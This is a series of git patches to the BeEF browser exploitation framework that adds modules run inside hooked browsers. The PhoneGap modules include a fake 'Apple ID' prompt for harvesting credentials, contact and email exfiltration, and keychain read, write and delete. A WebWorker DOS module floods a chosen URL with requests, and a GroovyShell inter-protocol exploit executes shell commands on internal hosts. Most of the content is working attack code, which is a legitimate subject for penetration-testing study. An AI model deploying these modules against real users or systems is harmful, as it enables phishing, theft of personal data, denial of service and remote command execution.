+        phonegap_globalization_status:
+            enable: true
+            category: "Phonegap"
+            name: "Globalization Status"
+            description: "Examine device local settings"
+            authors: ["staregate"]
+            target:
+                working: ["All"]
diff --git a/modules/phonegap/phonegap_globalization_status/module.rb b/modules/phonegap/phonegap_globalization_status/module.rb
new file mode 100644
index 000000000..1bb32a3ae
--- /dev/null
+++ b/modules/phonegap/phonegap_globalization_status/module.rb
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# // Phonegap_globalization_status
+
+class Phonegap_globalization_status < BeEF::Core::Command
+
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end 
+end

From 3dbfdbac7e5a2710da85615f2791b5f63408e199 Mon Sep 17 00:00:00 2001
From: Sergey Gorbaty <gorbaty.sergey@gmail.com>
Date: Fri, 3 May 2013 14:02:53 -0700
Subject: [PATCH 296/397] Adding user prompt

---
 .../phonegap/phonegap_prompt_user/command.js  | 29 ++++++++++++
 .../phonegap/phonegap_prompt_user/config.yaml | 17 +++++++
 .../phonegap/phonegap_prompt_user/module.rb   | 46 +++++++++++++++++++
 3 files changed, 92 insertions(+)
 create mode 100644 modules/phonegap/phonegap_prompt_user/command.js
 create mode 100644 modules/phonegap/phonegap_prompt_user/config.yaml
 create mode 100644 modules/phonegap/phonegap_prompt_user/module.rb

diff --git a/modules/phonegap/phonegap_prompt_user/command.js b/modules/phonegap/phonegap_prompt_user/command.js
new file mode 100644
index 000000000..b539e9b65
--- /dev/null
+++ b/modules/phonegap/phonegap_prompt_user/command.js
@@ -0,0 +1,29 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Phonegap_prompt_user
+//
+beef.execute(function() {
+    var title = "<%== @title %>";
+    var question = "<%== @question %>";
+    var ans_yes = "<%== @ans_yes %>";
+    var ans_no = "<%== @ans_no %>";
+    var result = '';
+
+   
+    function onPrompt(results) {
+        result = "Selected button number " + results.buttonIndex + " result: " + results.input1;
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );    
+    }
+
+    navigator.notification.prompt(
+        question,
+        onPrompt,      
+        title,         
+        [ans_yes,ans_no]
+    );
+  
+});
diff --git a/modules/phonegap/phonegap_prompt_user/config.yaml b/modules/phonegap/phonegap_prompt_user/config.yaml
new file mode 100644
index 000000000..f1e212eae
--- /dev/null
+++ b/modules/phonegap/phonegap_prompt_user/config.yaml
@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+#   Phonegap_prompt_user
+#
+beef:
+    module:
+        phonegap_prompt_user:
+            enable: true
+            category: "Phonegap"
+            name: "Prompt User"
+            description: "Ask device user a question"
+            authors: ["staregate"]
+            target:
+                working: ["All"]
diff --git a/modules/phonegap/phonegap_prompt_user/module.rb b/modules/phonegap/phonegap_prompt_user/module.rb
new file mode 100644
index 000000000..2aa3a373e
--- /dev/null
+++ b/modules/phonegap/phonegap_prompt_user/module.rb
@@ -0,0 +1,46 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# Phonegap_prompt_user
+#
+
+class Phonegap_prompt_user < BeEF::Core::Command
+  
+    def self.options
+        return [{
+            'name' => 'title', 
+            'description' => 'Prompt title', 
+            'ui_label'=>'Title', 
+            'value' => 'Apple ID',
+            'width' => '300px'
+            
+            },{
+            'name' => 'question', 
+            'description' => 'Prompt question', 
+            'ui_label'=>'Question', 
+            'value' => 'Please enter your Apple ID',
+            'width' => '300px'
+            },{
+            'name' => 'ans_yes', 
+            'description' => 'Prompt positive answer button label', 
+            'ui_label'=>'Yes', 
+            'value' => 'Submit',
+            'width' => '100px'
+            },{
+            'name' => 'ans_no', 
+            'description' => 'Prompt negative answer button label', 
+            'ui_label'=>'No', 
+            'value' => 'Cancel',
+            'width' => '100px'
+            }]
+  end
+
+  def callback
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end 
+
+end

From 0479744dfca8583e6e9dcb4359967bfb5d206f06 Mon Sep 17 00:00:00 2001
From: Sergey Gorbaty <gorbaty.sergey@gmail.com>
Date: Fri, 3 May 2013 14:14:19 -0700
Subject: [PATCH 297/397] added device model detection

---
 modules/phonegap/phonegap_detect/command.js | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/phonegap/phonegap_detect/command.js b/modules/phonegap/phonegap_detect/command.js
index ab725a8a8..49b4f55ce 100644
--- a/modules/phonegap/phonegap_detect/command.js
+++ b/modules/phonegap/phonegap_detect/command.js
@@ -17,7 +17,8 @@ beef.execute(function() {
         + " cordova api: " + device.cordova
         + " platform: " + device.platform
         + " uuid: " + device.uuid
-        + " version: " + device.version;
+        + " version: " + device.version
+	+ " model: " + device.model;
     } catch(e) {
         phonegap_details = "unable to detect phonegap";
     }

From 5722cb2bc1d4bb90257b071c727ef4736103e9bc Mon Sep 17 00:00:00 2001
From: Sergey Gorbaty <gorbaty.sergey@gmail.com>
Date: Fri, 3 May 2013 14:24:23 -0700
Subject: [PATCH 298/397] Added email to contact list

---
 .../phonegap/phonegap_list_contacts/command.js   | 16 ++++++++++------
 1 file changed, 10 insertions(+), 6 deletions(-)

diff --git a/modules/phonegap/phonegap_list_contacts/command.js b/modules/phonegap/phonegap_list_contacts/command.js
index 533def2e4..6587811af 100644
--- a/modules/phonegap/phonegap_list_contacts/command.js
+++ b/modules/phonegap/phonegap_list_contacts/command.js
@@ -12,15 +12,19 @@ beef.execute(function() {
     function onSuccess(contacts) {
 
          for (var i=0; i<contacts.length; i++) {
-            result = result + '\n' + contacts[i].displayName;
+            result = contacts[i].displayName;
             
             for (var j=0; j<contacts[i].phoneNumbers.length; j++) {
-                result = result + ' #' + contacts[i].phoneNumbers[j].value;
+                result = result + ' #:' + contacts[i].phoneNumbers[j].value;
             }
+
+            for (var j=0; j<contacts[i].emails.length; j++) {
+                result = result + ' @:' + contacts[i].emails[j].value;
+            }
+
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );    
+
         }
-
-        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );    
-
     };
 
     function onError(contactError) {
@@ -32,7 +36,7 @@ beef.execute(function() {
     var options = new ContactFindOptions();
     options.filter="";
     options.multiple=true; 
-    var fields = ["displayName", "phoneNumbers"];
+    var fields = ["displayName", "phoneNumbers", "emails"];
     
     navigator.contacts.find(fields, onSuccess, onError, options);
     

From b501fe7c1a4ef61dc1a1da4b8a4f23763d3f6ee6 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Sat, 4 May 2013 09:42:40 +0100
Subject: [PATCH 299/397] Updated Rack dependency in Gemfile in order to don't
 create conflicts with the updated Sinatra dependency.

---
 Gemfile | 1 +
 1 file changed, 1 insertion(+)

diff --git a/Gemfile b/Gemfile
index b1ecd1fd6..618ef7ca6 100644
--- a/Gemfile
+++ b/Gemfile
@@ -14,6 +14,7 @@ end
 gem "eventmachine", "1.0.3"
 gem "thin"
 gem "sinatra", "1.4.2"
+gem "rack", "1.5.2"
 gem "em-websocket", "~> 0.3.6"
 gem "jsmin", "~> 1.0.1"
 gem "ansi"

From 5bbf26abac49148b51bee2327179aa1ff787213f Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 6 May 2013 16:03:17 +0930
Subject: [PATCH 300/397] Add `beef.http.dns_port` config option

---
 config.yaml         | 6 ++++--
 core/main/server.rb | 3 ++-
 2 files changed, 6 insertions(+), 3 deletions(-)

diff --git a/config.yaml b/config.yaml
index 7e1a7c3d1..04d0226f1 100644
--- a/config.yaml
+++ b/config.yaml
@@ -27,7 +27,9 @@ beef:
         # if running behind a nat set the public ip address here
         #public: ""
         #public_port: "" # port setting is experimental
-        dns: "localhost"
+        # DNS
+        dns_host: "localhost"
+        dns_port: 53
         panel_path: "/ui/panel"
         hook_file: "/hook.js"
         hook_session_name: "BEEFHOOK"
@@ -56,7 +58,7 @@ beef:
         https:
             enable: false
             # In production environments, be sure to use a valid certificate signed for the value
-            # used in beef.http.dns (the domain name of the server where you run BeEF)
+            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
             key: "beef_key.pem"
             cert: "beef_cert.pem"
 
diff --git a/core/main/server.rb b/core/main/server.rb
index fc9389042..f9a22a245 100644
--- a/core/main/server.rb
+++ b/core/main/server.rb
@@ -41,7 +41,8 @@ module BeEF
             'beef_port'     => @configuration.get('beef.http.port'),
             'beef_public'   => @configuration.get('beef.http.public'),
             'beef_public_port' => @configuration.get('beef.http.public_port'),
-            'beef_dns'      => @configuration.get('beef.http.dns'),
+            'beef_dns_host' => @configuration.get('beef.http.dns_host'),
+            'beef_dns_port' => @configuration.get('beef.http.dns_port'),
             'beef_hook'     => @configuration.get('beef.http.hook_file'),
             'beef_proto'    => @configuration.get('beef.http.https.enable') == true ? "https" : "http",
             'client_debug'  => @configuration.get("beef.client.debug")

From 94d15cd386c186068739ad45d4b3c7fbeedbf3a4 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Tue, 7 May 2013 13:00:34 +0200
Subject: [PATCH 301/397] Added DOS module which allows you to send multiple
 GET or POST requests to a target, from a WebWorker in order to don't slow
 down the whole browser.

---
 modules/network/DOSer/command.js  | 33 +++++++++++++++++++++++
 modules/network/DOSer/config.yaml | 15 +++++++++++
 modules/network/DOSer/module.rb   | 26 ++++++++++++++++++
 modules/network/DOSer/worker.js   | 45 +++++++++++++++++++++++++++++++
 4 files changed, 119 insertions(+)
 create mode 100644 modules/network/DOSer/command.js
 create mode 100644 modules/network/DOSer/config.yaml
 create mode 100644 modules/network/DOSer/module.rb
 create mode 100644 modules/network/DOSer/worker.js

diff --git a/modules/network/DOSer/command.js b/modules/network/DOSer/command.js
new file mode 100644
index 000000000..bac612bd1
--- /dev/null
+++ b/modules/network/DOSer/command.js
@@ -0,0 +1,33 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+    var url = '<%= @url %>';
+    var delay = '<%= @delay %>';
+    var method = '<%= @method %>';
+    var post_data = '<%= @post_data %>';
+
+    if(!!window.Worker){
+    var myWorker = new Worker('http://' + beef.net.host + ':' + beef.net.port + '/worker.js');
+
+    myWorker.onmessage = function (oEvent) {
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, oEvent.data);
+    };
+
+        var data = {};
+        data['url'] = url;
+    data['delay'] = delay;
+    data['method'] = method;
+    data['post_data'] = post_data;
+
+    myWorker.postMessage(data);
+    }else{
+       beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Error: WebWorkers are not supported on this browser.');
+    }
+
+
+});
diff --git a/modules/network/DOSer/config.yaml b/modules/network/DOSer/config.yaml
new file mode 100644
index 000000000..553f3f934
--- /dev/null
+++ b/modules/network/DOSer/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        doser:
+            enable: true
+            category: "Network"
+            name: "DOSer"
+            description: "Do infinite GET or POST requests to a target, spawning a WebWorker in order to don't slow down the hooked page. If the browser doesn't support WebWorkers, the module will not run."
+            authors: ["antisnatchor"]
+            target:
+                working: ["ALL"]
diff --git a/modules/network/DOSer/module.rb b/modules/network/DOSer/module.rb
new file mode 100644
index 000000000..625a98151
--- /dev/null
+++ b/modules/network/DOSer/module.rb
@@ -0,0 +1,26 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Doser < BeEF::Core::Command
+
+  def pre_send
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/doser/worker.js', '/worker', 'js')
+  end
+
+  def self.options
+    return [
+    	{'name' => 'url', 'ui_label' => 'URL', 'value' => 'http://target/path'},
+      {'name'=>'delay', 'ui_label' =>'Delay between requests (ms)','value'=>'10'},
+      {'name'=>'method', 'ui_label' =>'HTTP Method','value'=>'POST'},
+      {'name'=>'post_data', 'ui_label' =>'POST data','value'=>'key=value&&Aa=Aa&BB'}
+    ]
+  end
+  
+  def post_execute
+    return if @datastore['result'].nil?
+    save({'result' => @datastore['result']})
+  end
+  
+end
diff --git a/modules/network/DOSer/worker.js b/modules/network/DOSer/worker.js
new file mode 100644
index 000000000..70a0db010
--- /dev/null
+++ b/modules/network/DOSer/worker.js
@@ -0,0 +1,45 @@
+var url = "";
+var delay = 0;
+var method = "";
+var post_data = "";
+var counter = 0;
+
+onmessage = function (oEvent) {
+ url = oEvent.data['url'];
+ delay = oEvent.data['delay'];
+ method = oEvent.data['method'];
+ post_data = oEvent.data['post_data'];
+ doRequest();
+};
+
+function noCache(u){
+ var result = "";
+ if(u.indexOf("?") > 0){
+  result = "&" + Date.now() + Math.random();
+ }else{
+  result = "?" + Date.now() + Math.random();
+ }
+ return result;
+}
+
+function doRequest(){
+ setInterval(function(){
+
+  var xhr = new XMLHttpRequest();
+  xhr.open(method, url + noCache(url));
+  xhr.setRequestHeader('Accept','*/*');
+  xhr.setRequestHeader("Accept-Language", "en");
+  if(method == "POST"){
+    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
+    xhr.send(post_data);
+  }else{
+    xhr.send(null);
+  }
+  counter++;
+
+ },delay);
+
+ setInterval(function(){
+ postMessage("Requests sent: " + counter);
+ },10000);
+}
\ No newline at end of file

From 55d85069602524ff04716d5c00d9b71c258be4fa Mon Sep 17 00:00:00 2001
From: Sergey Gorbaty <gorbaty.sergey@gmail.com>
Date: Tue, 7 May 2013 17:10:12 -0700
Subject: [PATCH 302/397] Added primitive phonegap plugin detection

---
 .../phonegap_plugin_detection/command.js      | 49 +++++++++++++++++++
 .../phonegap_plugin_detection/config.yaml     | 17 +++++++
 .../phonegap_plugin_detection/module.rb       | 14 ++++++
 3 files changed, 80 insertions(+)
 create mode 100644 modules/phonegap/phonegap_plugin_detection/command.js
 create mode 100644 modules/phonegap/phonegap_plugin_detection/config.yaml
 create mode 100644 modules/phonegap/phonegap_plugin_detection/module.rb

diff --git a/modules/phonegap/phonegap_plugin_detection/command.js b/modules/phonegap/phonegap_plugin_detection/command.js
new file mode 100644
index 000000000..557566d76
--- /dev/null
+++ b/modules/phonegap/phonegap_plugin_detection/command.js
@@ -0,0 +1,49 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// phonegap_plugin_detection
+//
+beef.execute(function() {
+    var result = '';
+
+    // Approximate list of plugins, intended to work with Cordova 2.x
+    var plugins = new Array(
+        "cordova/plugin/device",
+        "cordova/plugin/logger",
+        "cordova/plugin/compass",
+        "cordova/plugin/accelerometer",
+        "cordova/plugin/Camera",
+        "cordova/plugin/network",
+        "cordova/plugin/contacts",
+        "cordova/plugin/echo",
+        "cordova/plugin/File",
+        "cordova/plugin/FileTransfer",
+        "cordova/plugin/geolocation",
+        "cordova/plugin/notification",
+        "cordova/plugin/Media",
+        "cordova/plugin/capture",
+        "cordova/plugin/splashscreen",
+        "cordova/plugin/battery",
+        "cordova/plugin/globalization",
+        "cordova/plugin/InAppBrowser",
+        "cordova/plugin/keychain"
+    );
+
+    for (var i=0; i<plugins.length; i++) {
+        try {
+            var a = cordova.require(plugins[i]);
+            if (a !== undefined) {
+                result = result + '\n plugin: ' + plugins[i];
+            }
+        } catch (err) {
+            // do nothing
+        }
+    }
+
+
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+   
+});
\ No newline at end of file
diff --git a/modules/phonegap/phonegap_plugin_detection/config.yaml b/modules/phonegap/phonegap_plugin_detection/config.yaml
new file mode 100644
index 000000000..a5a09713e
--- /dev/null
+++ b/modules/phonegap/phonegap_plugin_detection/config.yaml
@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+#   phonegap_plugin_detection
+#
+beef:
+    module:
+        phonegap_plugin_detection:
+            enable: true
+            category: "Phonegap"
+            name: "List Plugins"
+            description: "Attempts to guess installed plugins."
+            authors: ["staregate"]
+            target:
+                working: ["All"]
diff --git a/modules/phonegap/phonegap_plugin_detection/module.rb b/modules/phonegap/phonegap_plugin_detection/module.rb
new file mode 100644
index 000000000..f9567f8bf
--- /dev/null
+++ b/modules/phonegap/phonegap_plugin_detection/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# // phonegap_plugin_detection
+
+class Phonegap_plugin_detection < BeEF::Core::Command
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end 
+end

From 498372aef31955f8c6fa81392943688a47e2e35e Mon Sep 17 00:00:00 2001
From: Sergey Gorbaty <gorbaty.sergey@gmail.com>
Date: Wed, 8 May 2013 13:18:31 -0700
Subject: [PATCH 303/397] Adding phonegap integration with keychain plugin

---
 modules/phonegap/phonegap_keychain/command.js | 82 +++++++++++++++++++
 .../phonegap/phonegap_keychain/config.yaml    | 17 ++++
 modules/phonegap/phonegap_keychain/module.rb  | 53 ++++++++++++
 3 files changed, 152 insertions(+)
 create mode 100644 modules/phonegap/phonegap_keychain/command.js
 create mode 100644 modules/phonegap/phonegap_keychain/config.yaml
 create mode 100644 modules/phonegap/phonegap_keychain/module.rb

diff --git a/modules/phonegap/phonegap_keychain/command.js b/modules/phonegap/phonegap_keychain/command.js
new file mode 100644
index 000000000..57d0f0693
--- /dev/null
+++ b/modules/phonegap/phonegap_keychain/command.js
@@ -0,0 +1,82 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Phonegap_keychain
+//
+beef.execute(function() {
+    var servicename = "<%== @servicename %>";
+    var key = "<%== @key %>";
+    var value = "<%== @value %>";
+    var action = "<%== @action %>";
+    var result = '';
+    var kc = '';
+
+    try {
+        kc = cordova.require("cordova/plugin/keychain");
+    } catch (err) {
+        result = 'Unable to access keychain plugin';
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+    }
+
+    function onGet()
+    {  
+        var win = function(value) {
+            result = result + "GET SUCCESS - Key: " + key + " Value: " + value;
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+
+        };
+        var fail = function(error) {
+            result = result + "GET FAIL - Key: " + key + " Error: " + error;
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+        };
+        
+        kc.getForKey(win, fail, key, servicename);
+
+    }
+    
+    function onSet()
+    {        
+        var win = function() {
+            result = result + "SET SUCCESS - Key: " + key;
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+        };
+        var fail = function(error) {
+            result = result + "SET FAIL - Key: " + key + " Error: " + error;
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+        };
+        
+        kc.setForKey(win, fail, key, servicename, value);
+    }
+    
+    function onRemove()
+    {
+        var win = function() {
+            result = result + "REMOVE SUCCESS - Key: " + key;
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+        };
+        var fail = function(error) {
+            result = result + "REMOVE FAIL - Key: " + key + " Error: " + error;
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+        };
+        
+        kc.removeForKey(win, fail, key, servicename);
+    }
+
+    if (kc !== undefined)  {
+        switch(action) {
+            case 'Read':
+                onGet();
+                break;
+            case 'CreateUpdate':
+                onSet();
+                break;
+            case 'Delete':
+                onRemove();
+                break;
+        }
+    } 
+
+});
diff --git a/modules/phonegap/phonegap_keychain/config.yaml b/modules/phonegap/phonegap_keychain/config.yaml
new file mode 100644
index 000000000..bd1ae43d7
--- /dev/null
+++ b/modules/phonegap/phonegap_keychain/config.yaml
@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+#   Phonegap_keychain
+#
+beef:
+    module:
+        phonegap_keychain:
+            enable: true
+            category: "Phonegap"
+            name: "Keychain"
+            description: "Read/CreateUpdate/Delete Keychain Elements"
+            authors: ["staregate"]
+            target:
+                working: ["All"]
diff --git a/modules/phonegap/phonegap_keychain/module.rb b/modules/phonegap/phonegap_keychain/module.rb
new file mode 100644
index 000000000..17260b9ec
--- /dev/null
+++ b/modules/phonegap/phonegap_keychain/module.rb
@@ -0,0 +1,53 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# Phonegap_keychain
+#
+
+class Phonegap_keychain < BeEF::Core::Command
+  
+    def self.options
+        return [{
+            'name' => 'servicename', 
+            'description' => 'Service name', 
+            'ui_label'=>'Service name', 
+            'value' => 'ServiceNameTest',
+            'width' => '300px'
+            
+            },{
+            'name' => 'key', 
+            'description' => 'Key', 
+            'ui_label'=>'Key', 
+            'value' => 'TestKey',
+            'width' => '300px'
+            },{
+            'name' => 'value', 
+            'description' => 'Value', 
+            'ui_label'=>'Value', 
+            'value' => 'TestValue',
+            'width' => '100px'
+            },{
+            'name' => 'action', 
+            'type' => 'combobox',
+            'ui_label' => 'Action Type',
+            'store_type' => 'arraystore', 
+            'store_fields' => ['action'], 
+            'store_data' => [['Read'],['CreateUpdate'],['Delete']], 
+            'valueField' => 'action', 
+            'value' => 'CreateUpdate', 
+            editable: false, 
+            'displayField' => 'action', 
+            'mode' => 'local', 
+            'autoWidth' => true 
+          }]
+  end
+
+  def callback
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end 
+
+end

From 7de48ceafb02d0e753efe32c6d60dcc55e0e1eed Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Wed, 22 May 2013 02:32:27 +0930
Subject: [PATCH 304/397] Add GroovyShell Server Command Execution IPEC exploit
 module

---
 .../groovyshell_server_cmd_exec/command.js    | 43 +++++++++++++++++++
 .../groovyshell_server_cmd_exec/config.yaml   | 16 +++++++
 .../groovyshell_server_cmd_exec/module.rb     | 22 ++++++++++
 3 files changed, 81 insertions(+)
 create mode 100644 modules/exploits/groovyshell_server_cmd_exec/command.js
 create mode 100644 modules/exploits/groovyshell_server_cmd_exec/config.yaml
 create mode 100644 modules/exploits/groovyshell_server_cmd_exec/module.rb

diff --git a/modules/exploits/groovyshell_server_cmd_exec/command.js b/modules/exploits/groovyshell_server_cmd_exec/command.js
new file mode 100644
index 000000000..9eeaf268f
--- /dev/null
+++ b/modules/exploits/groovyshell_server_cmd_exec/command.js
@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var rhost   = '<%= @rhost %>'; 
+	var rport   = '<%= @rport %>';
+	var timeout = '<%= @timeout %>';
+
+	// validate payload
+	try {
+		var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+		var payload = '\r\ndiscard\r\nprintln "'+cmd+'".execute().text\r\ngo\r\nexit\r\n'
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+		return;
+	}
+
+	// validate target details
+	if (!rport || !rhost || isNaN(rport)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+		return;
+	}
+	if (rport > 65535 || rport < 0) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+		return;
+	}
+
+	// send commands
+	var groovy_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, payload);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(groovy_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/groovyshell_server_cmd_exec/config.yaml b/modules/exploits/groovyshell_server_cmd_exec/config.yaml
new file mode 100644
index 000000000..9ce57c7af
--- /dev/null
+++ b/modules/exploits/groovyshell_server_cmd_exec/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        groovyshell_server_command_execution:
+            enable: true
+            category: "Exploits"
+            name: "GroovyShell Server Command Execution"
+            description: "This module uses the GroovyShell Server interface (default port 6789) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF."
+            authors: ["bcoles"]
+            target:
+                working: ["FF", "C"]
+                not_working: ["IE"]
diff --git a/modules/exploits/groovyshell_server_cmd_exec/module.rb b/modules/exploits/groovyshell_server_cmd_exec/module.rb
new file mode 100644
index 000000000..e1dc60f1d
--- /dev/null
+++ b/modules/exploits/groovyshell_server_cmd_exec/module.rb
@@ -0,0 +1,22 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Groovyshell_server_command_execution < BeEF::Core::Command
+
+  def self.options
+    return [
+	{'name'=>'rhost',   'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+	{'name'=>'rport',   'ui_label' => 'Remote Port', 'value' => '6789'},
+	{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+	{'name'=>'cmd',     'ui_label' => 'Commands',    'description' => 'Enter shell commands to execute.', 'type'=>'textarea', 'value'=>'id', 'width'=>'200px' },
+    ]
+  end
+
+  def post_execute
+	save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+	save({'fail'   => @datastore['fail']})   if not @datastore['fail'].nil?
+  end
+
+end

From 2dae1d4c0746823c1463f80f554289c831ee5c06 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Wed, 22 May 2013 14:37:01 +0930
Subject: [PATCH 305/397] Add `/bin/sh -c` to default command

---
 modules/exploits/groovyshell_server_cmd_exec/command.js  | 2 +-
 modules/exploits/groovyshell_server_cmd_exec/config.yaml | 2 +-
 modules/exploits/groovyshell_server_cmd_exec/module.rb   | 2 +-
 3 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/groovyshell_server_cmd_exec/command.js b/modules/exploits/groovyshell_server_cmd_exec/command.js
index 9eeaf268f..3b8d43fd8 100644
--- a/modules/exploits/groovyshell_server_cmd_exec/command.js
+++ b/modules/exploits/groovyshell_server_cmd_exec/command.js
@@ -13,7 +13,7 @@ beef.execute(function() {
 	// validate payload
 	try {
 		var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
-		var payload = '\r\ndiscard\r\nprintln "'+cmd+'".execute().text\r\ngo\r\nexit\r\n'
+		var payload = '\r\ndiscard\r\nprintln \''+cmd+'\'.execute().text\r\ngo\r\nexit\r\n'
 	} catch(e) {
 		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
 		return;
diff --git a/modules/exploits/groovyshell_server_cmd_exec/config.yaml b/modules/exploits/groovyshell_server_cmd_exec/config.yaml
index 9ce57c7af..8bb4a20b5 100644
--- a/modules/exploits/groovyshell_server_cmd_exec/config.yaml
+++ b/modules/exploits/groovyshell_server_cmd_exec/config.yaml
@@ -9,7 +9,7 @@ beef:
             enable: true
             category: "Exploits"
             name: "GroovyShell Server Command Execution"
-            description: "This module uses the GroovyShell Server interface (default port 6789) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF."
+            description: "This module uses the GroovyShell Server interface (default port 6789) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: Spaces in the command are not supported."
             authors: ["bcoles"]
             target:
                 working: ["FF", "C"]
diff --git a/modules/exploits/groovyshell_server_cmd_exec/module.rb b/modules/exploits/groovyshell_server_cmd_exec/module.rb
index e1dc60f1d..8f0526eb8 100644
--- a/modules/exploits/groovyshell_server_cmd_exec/module.rb
+++ b/modules/exploits/groovyshell_server_cmd_exec/module.rb
@@ -10,7 +10,7 @@ class Groovyshell_server_command_execution < BeEF::Core::Command
